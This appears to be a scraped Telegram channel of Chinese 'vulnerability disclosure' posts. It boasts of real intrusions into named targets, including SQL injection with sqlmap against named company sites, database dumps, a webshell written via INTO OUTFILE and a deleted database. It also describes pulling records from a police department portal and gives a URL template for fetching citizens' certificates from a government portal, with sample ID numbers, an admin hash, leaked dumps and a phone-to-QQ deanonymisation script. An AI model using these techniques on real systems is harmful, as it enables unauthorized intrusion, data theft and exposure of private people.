BYSGS会所---网站漏洞公布
15.3K subscribers
26 photos
4 files
14 links
频道主: @KHCHADANG
双向机器人: @SHANGGANSHEN_bot
我的接口频道: https://t.me/BYJIEKOSHEN
我的数据频道: https://t.me/SGSSHUJUKU
我的技术频道: https://t.me/HackerCCTV
我的倾诉频道: https://t.me/SGSYYDSNB
我的倾诉群聊: https://t.me/NNSGSYYDS
记住我的名字就好 我是个极度厌世的人
Download Telegram
qf.zip
7.2 KB
概率Q反(需要root)——全自动手机号跑搜索框
烨筱and伤肝肾
@love_so_yexiao)and(@KHCHADANG

解压密码 https://t.me/yexiao_love_you


脚本原理:Tim(轻量版QQ),批量手机号反QQ账号头像URL进行对比,因为是屏幕脚本所以需要root用户使用该脚本。
请使用Termux 安装相关的库 和 tsu,不懂的可以去问群里大牛

测试效果↓
17324958813 - http://thirdqq.qlogo.cn/g?b=oidb&k=4H0jEFqX9hJrD1FxvxVXQA&kti=aQm0VQwB4hA&s=40
15322509015 - http://thirdqq.qlogo.cn/g?b=oidb&k=o11FCyCnLqOEd1IDygg2AQ&kti=aQm03wwB4hA&s=40
15090536410 - http://thirdqq.qlogo.cn/g?b=oidb&k=5dJzT4bhyqNIPBibZHJqJUA&kti=aQm06AwB4hI&s=40


注:里面的对比脚本要用电脑安装opencv,arm安卓不支持opencv
termux运行主程序
mt管理器root运行配套sh

使用tim的搜索框部分实现
如果用不了就去自己抓xy坐标自己填到脚本里面
开发者模式开触摸坐标显示,长按查看上面显示的xy
脚本里面第一个坐标是搜索框的最右侧(不是清除,一定要靠右),第二个坐标是手机输入法的回车键

运行主程序py之前一定要给tim打开,自己随便搜一个手机号之后再点击一遍那个输入框

唯一留言:叮当猫管理员是我的吹牛资本,诈骗和装逼也是我的最强手段,我的所有能力来源别人的想象力,我的人脉全来自我的吹牛逼技术,得到很多人的好感度,我的一句话就能让我的人脉害死你全家,我的一句话就能让别人给我全国头接口玩,我喜欢拿着别人的全国头泛滥,然后栽赃陷害给别人,说是别人想要泛滥自己才泛滥,我喜欢装大佬,跟别人说Q反的方向是我给的,我脑电波意淫出来的邮箱Q反就是我的压箱底接口,这辈子不会泛滥,你以为我是接口神?错了,我接口都是巴结别人的!你以为我是逆向解密大牛?错了,我是巴结别人给我解密的!我的组织连几个卖号的都能进去,这就是我组织的魅力,没有指名道姓说谁,不要在评论区破防对号入座,希望改正好自己虚伪的性格,并不是对某组织所有人存在恶意,大部分人存在一定的实力,只是对某人的人品做单方面评价

没有指名道姓说谁哦~ 急=输

请不要指点江山 虽然这个Q反含金量再怎么低 我们也承认只是个概率Q反 但请不要因此说垃圾或没用 经典之:拿破仑发现新大陆回来之后名声大噪,但是很多人都在偷偷议论说只要有人一直开船向那个方向开,谁都可以发现新大陆。有一次拿破仑知道他们议论的事之后,跟周围的人说:“你们谁能将一个鸡蛋立在桌子上面而不动?”周围的人都没有动,静静看着拿破仑表演。拿破仑拿起鸡蛋砸的凹进去了一点,鸡蛋果然立在桌子上不动了。众人嘲笑道:“这有什么好炫耀的,人人都知道的道理罢了。”拿破仑说:“本身就没什么好炫耀的,可是先生们,女士们,你们怎么没想过用到这个方法呢?难道真的是因为你们想到了只是懒得动吗?”
5
今日分享:黑龙江省公安厅
等级:高危

这里我们选择个人登录,只有登陆后才能更好的去测试

进入后发现系统维护中,这里我们使用 F12,查看源码,把系统维护中的遮罩删除

删除后我们发现可以正常使用了,这里我们选择进入进度查询 (一般来说我们挖掘后台洞都会选择 查询 预约 申报 个人信息这些功能点)

这里我们查看Js源码 发现存在一个/api/hljga-serv/projectApplyDelivery

这里我们抓包进行访问

成功拿到获取敏感数据上千条

@Yuhui_ddos
14😍1
BYSGS会所---网站漏洞公布
qf.zip
留言内涵的不是蛤蟆,而是其他人😪,不要乱套
Please open Telegram to view this post
VIEW IN TELEGRAM
今日分享:森玛克精工科技(江苏)有限公司
链接: http://www.semirke.com/about.php?id=1
等级:SQL注入 -> Getshell
首先在对目标进行信息收集时,发现其官网一处 about.php 参数存在sql注入漏洞。通过sqlmap进行探测,确认了时间盲注和联合查询注入的存在,并成功获取数据库 adm82571079_db 的权限。
深入数据库后发现,其中存放着公司最核心的业务数据。这里共计拿到该公司的一些技术数据,包括各类减速机、电机的核心设计图纸、技术参数、物料清单(BOM表)。此外,还获取了国内客户的详细联系方式、历年销售合同及定价策略,以及国内供应商名单。

接着,为进一步窃取服务器上的文件资料,我们利用SQL注入的 INTO OUTFILE 功能,在读取网站配置文件获取到物理路径后,成功写入webshell,控制了服务器

这里成功进入内网了,后续在进行内部资料寻找,把中心放在研发和财务部门的文件服务器中,不过都是支出流水和一些工作报告,没什么用

目前把sql数据库的东西全删了,网站还能访问,欢迎各位大牛访问。😄

ps:图片默认保存的路径找不到了,只能纯文本了QAQ

@Yuhui_ddos thank you~
4
今日渗透分享:北京京瀚禹电子工程技术有限公司SQL注入
目标:北京京瀚禹电子工程技术有限公司 ( jhyjczx.com )
技术栈:PHP 5.2.17, Apache, MySQL 5.0.12
在对目标进行信息收集中,发现 about.php?cid=1&id=2 这个URL存在注入风险。
直接上sqlmap,扫描结果非常给力:
一个时间盲注、一个布尔盲注、一个联合注入,UNION查询的存在,基本可以判断无WAF,直接开始脱库。
数据获取:
成功获取数据库 bdm10851955_db,其中 admin 表引起了我们的注意:
Database: bdm10851955_db
Table: admin
[1 entry]
+--------------+----------------------------------+
| aname | apass |
+--------------+----------------------------------+
| jhywzhht2511 | 122c79b410c885197c565617a1066142 |
+--------------+----------------------------------+
密码是MD5加密,没去暴力破解,感兴趣的可以自己试试
总结
一个严重的SQL注入,直接导致后台失守。本来后面还有一个竞争条件可以拿shell,但懒得搞了,我要去玩明日方舟终末地!!!
作者: @Yuhui_ddos
来源:
@Yuhui_net
4
jhyjczx.com.zip
105 KB
jhyjczx.com 此站脱库数据
支付宝苹果免密漏洞.pdf
10.9 MB
一名Java 后端开发工程师,同时也是电信诈骗受害者,披露了一起涉及 “苹果 + 支付宝免密支付授权” 的严重安全问题。
受害者在完全不知情的情况下,仅一次 0.1 元操作,就被连续盗刷 999 元两笔。

@Yuhui_ddos 👏👏👏
🤯133
目标链接:http://eflybird.com/products_list.php?nid=19
技术栈:PHP 5.2.17, Apache,MySQL >= 5.0.12
在对目标进行信息收集中,发现 http://eflybird.com/products_list.php?nid=19 这个URL存在注入风险,毕竟依赖后端嘛wwww
sqlmap一扫果然有货(依旧御三家,我是不是不应该再玩sql注入了?换一个别的玩玩?)一个一个布尔盲注、一个联合注入,因为联合查询的存在,基本可以判断无WAF,直接开始脱库(本次只脱了一部分)
成功获取数据库,叫bdm252107493_db
其中的user十分肥美啊!(篇幅限制原因这里不展示,自行查看压缩包)
密码还是MD5加密,暴力破解燃尽了,rockyou没出,许愿有人为我破解
总结:很典的sql注入,不过多解释了。对了我就是个渗透兴趣爱好者,我玩玩这种小站就好~
作者: @Yuhui_ddos
6
内蒙古 名下证
不动产 身份证 结婚证 等等...

蒙古个人政务上传地址
来自个人证件
https://zwfw.nmg.gov.cn/elec/namelist?name=

空查询如:
件办理\"},{\"defineAuthorityName\":\"中华人民共和国公安部\",\"certificateHolderCategory\":\"1\",\"subjectId\":\"8FBEB09982DCF90FE050817B0CFE27AB\",\"certificateTypeName\":\"户口迁移证\",\"validityRange\":\"长期

选择好 电子证照

我们去
https://zwfw.nmg.gov.cn/personal_center/getPersonCard?curr=1&pageSize=10&regionCode=&keyword=&_=1766256805566
=============
知道: 内蒙古政务服务网个人中心证照接口链接,需登录 + 通过官网入口访问
({"msg":"success","state":200,"data":{"head":{"message":"未找到匹配的证照信息","status":"10"},"data":{"total":0,"size":0,"page":0,"cell":null}}})


重点 重点 重点 重点

回到查询个人证照:
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do

互联网政务服务门户后台管理系统

我们需要一个完整的 请求方式
申请人证件号码
申请人
材料唯一标识 ID
材料
网上办件 ID

{
"链接用途": "内蒙古政务服务网材料库信息查询接口",
"参数列表": [
{
"参数名": "applicantCardNumber",
"参数值": "150428199212114715",
"含义": "申请人证件号码(18位身份证号)"
},
{
"参数名": "materialOid",
"参数值": "ff8080817de68dd1017dea2074b952e0",
"含义": "材料唯一标识ID(系统内部定位具体材料)"
},
{
"参数名": "netCaseId",
"参数值": "8a8c970a9b2f8544019b3d0b667b232f",
"含义": "网上办件ID(对应具体政务申请记录)"
}
]
}


我们知道了 模板url
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do?applicantCardNumber=内容一&materialOid=内容二&netCaseId=内容三


我们回到上面的 第一个url 通过证照 我们可以获得
materialOid 和 netCaseId 两个参数假设参数是
材料唯一标识ID
ff8080817de68dd1017dea2074b952e0

网上办件ID
8a8c970a9b2f8544019b3d0b667b232f

applicantCardNumber 证件号
我们用 150428199212114715 来演示

组合起来我们可以获得这样一个url
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do?applicantCardNumber=150428199212114715&materialOid=ff8080817de68dd1017dea2074b952e0&netCaseId=8a8c970a9b2f8544019b3d0b667b232f

如图
还有更多的玩法 自行发觉

ps: 好消息内蒙古名下证照 坏消息 内蒙古人不上网
1🤔1
小米所谓的超级小爱再每次启动时都会向https://i.xiaomixiaoai.com/api/suggest/dispatch/oauth/proxy POST巨额包含用户隐私信息的内容,高危的包括但不限于:
· 设备ID(设备唯一识别码,可用于长期追踪)
· 用户ID(用户账户识别码,可关联到个人账号)
· 应用包名和版本(显示正在使用的具体应用)
· 设备型号(具体硬件型号信息)
其他的:
· Android系统版本(12)
· MIUI系统版本(14)
· 操作系统具体版本(22.10.26)
· 小米AI服务版本信息
· 20项系统设置状态(蓝牙、WiFi、位置服务等开关状态)
· 隐私设置(个性化推荐开关)
· 当前运行的应用活动页面
· 第三方应用查询信息(本次为空)
13😍6🤨5🤯2🤩1